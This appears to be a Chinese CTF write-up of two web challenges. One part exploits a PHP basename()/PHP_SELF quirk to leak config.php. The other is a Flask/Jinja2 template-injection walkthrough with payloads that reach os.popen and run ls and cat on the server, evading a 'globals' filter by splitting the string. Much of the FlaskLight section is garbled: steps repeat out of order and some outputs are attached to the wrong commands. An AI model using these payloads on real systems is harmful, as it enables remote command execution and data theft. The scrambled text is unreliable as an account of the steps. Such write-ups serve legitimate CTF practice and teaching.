[Zer0pts2020]Can you guess it?
1 | <?php |
绕过hash_equals的思路来是行不通的,该函数并没有漏洞也没有使用错误。
但是可以留意到显示源码的逻辑部分故作玄虚没有使用简洁的__FILE__
而是采用basename
函数截取$_SERVER['PHP_SELF']
,本题的利用点也就在此处。
$_SERVER['PHP_SELF']
会获取我们当前的访问路径,并且PHP在根据URI解析到对应文件后会忽略掉URL中多余的部分,即若访问存在的index.php页面,如下两种UR均会访问到。
basename
可以理解为对传入的参数路径截取最后一段作为返回值,但是该函数发现最后一段为不可见字符时会退取上一层的目录
接下来就显然了,通过构造URI让其包含config.php
这个文件名再让basename
函数截取出来,之后通过请求参数source
就能显示config.php
的源码,也就能见到flag
了。
payload:
url+/index.php/config.php/%ff?source
直接将文件的最后的文件读出,若不能识别,则返回上一级的文件名,打开该文件。
[CSCCTF 2019 Qual]FlaskLight
\1. 进入题目可也看到有一个FlaskLight的提示,以及页面上显示你查询的和查询的结果字样。先查看源码发现提示内容:有一个get请求方式的参数search
\2. 传递参数search并进行模板注入的测试,输入?search=40,页面输出表达式的结果,很好可以进行模板注入,回显点在You searched for下面
\3. 寻找执行命可以借助的类
a. 获取变量[]所属的类名
1 | {{[].__class__}} |
页面回显 <type ‘list’>
b. 获取list所继承的基类名
1 | {{[].__class__.__base__}} |
页面回显 <type ‘object’>
c. 获取所有继承自object的类
1 | {{[].__class__.__base__.__subclasses__()}} |
这里回显了很长一个列表,这里可以将这些数据放在列表中,通过list.index输出想要的类在第几位。不过需要对这传数据进行简单的处理(将<>换成””)
d. 经过查询后,可以借助的类<class ‘warnings.catch_warnings’>,没有内置os模块在第59位。<class ‘site._Printer’> 内含os模块 在第71位,可以借助这些类来执行命令。
不含os模块的类warnings.catch_warnings
进行命令执行
a. 目录读取
1 | {{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}} |
PS:由于使用[‘globals‘]会造成500的服务器错误信息,并且当我直接输入search=globals时页面也会500,觉得这里应该是被过滤了,所以这里采用了字符串拼接的形式[‘glo’+’bals‘]
页面回显:bin boot dev etc flasklight home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
b. 读取目录flasklight
1 | {{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls /flasklight').read()")}} |
页面回显:app.py coomme_geeeett_youur_flek
c. cat文件 coomme_geeeett_youur_flek 得到flag
1 | {{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('cat /flasklight/coomme_geeeett_youur_flek ').read()")}} |
页面回显:app.py coomme_geeeett_youur_flek
c. cat文件 coomme_geeeett_youur_flek 得到flag
1 | {{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('cat /flasklight/coomme_geeeett_youur_flek ').read()")}} |
PS:由于使用[‘globals‘]会造成500的服务器错误信息,并且当我直接输入search=globals时页面也会500,觉得这里应该是被过滤了,所以这里采用了字符串拼接的形式[‘glo’+’bals‘]
页面回显:bin boot dev etc flasklight home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
b. 读取目录flasklight
1 | {{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls /flasklight').read()")}} |
页面回显:app.py coomme_geeeett_youur_flek
c. cat文件 coomme_geeeett_youur_flek 得到flag
1 | {{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('cat /flasklight/coomme_geeeett_youur_flek ').read()")}} |
页面回显:app.py coomme_geeeett_youur_flek
c. cat文件 coomme_geeeett_youur_flek 得到flag
1 | {{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('cat /flasklight/coomme_geeeett_youur_flek ').read()")}} |
d. 之后又cat了一下同目录下的app.py文件,发现确实gloabls在和名单下
内含os模块的类 class’site._Printer’
a. 目录查询
1 | {{[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls').read()}} |
因为这里listdir同样被ban了
b. 读取目录flasklight
1 | {{[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls /flasklight').read()}} |
c. 读取flag
1 | {{[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('cat coomme_geeeett_youur_flek').read()}} |
c. 读取flag
1 | {{[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('cat coomme_geeeett_youur_flek').read()}} |
因为这里listdir同样被ban了
b. 读取目录flasklight
1 | {{[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls /flasklight').read()}} |
c. 读取flag
1 | {{[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('cat coomme_geeeett_youur_flek').read()}} |
1 | a. 获取变量[]所属的类名 {{[].__class__}} |